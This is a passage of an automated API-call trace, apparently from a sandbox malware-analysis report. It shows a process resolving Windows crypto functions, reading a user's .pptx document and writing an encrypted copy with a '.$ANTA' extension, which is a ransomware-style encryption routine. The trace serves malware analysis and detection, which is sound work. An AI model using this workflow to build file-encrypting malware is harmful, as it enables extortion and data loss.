Size=0x10) returned 0x43ca778 [0077.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.158] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0077.158] CryptDestroyHash (hHash=0x41ac040) returned 1 [0077.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nddxnatd.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0077.158] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.158] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0077.159] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.159] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\nddxnatd.pptx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.160] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0077.160] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.163] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0077.163] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0077.166] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x5fcc, lpOverlapped=0x0) returned 1 [0077.167] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0077.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0077.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0077.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.174] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.174] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.174] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.176] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.176] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.177] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.178] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0077.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0077.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0077.179] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0077.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0077.180] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2680, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2680*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0077.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0077.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0077.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0077.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0077.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0077.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0077.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0077.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0077.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 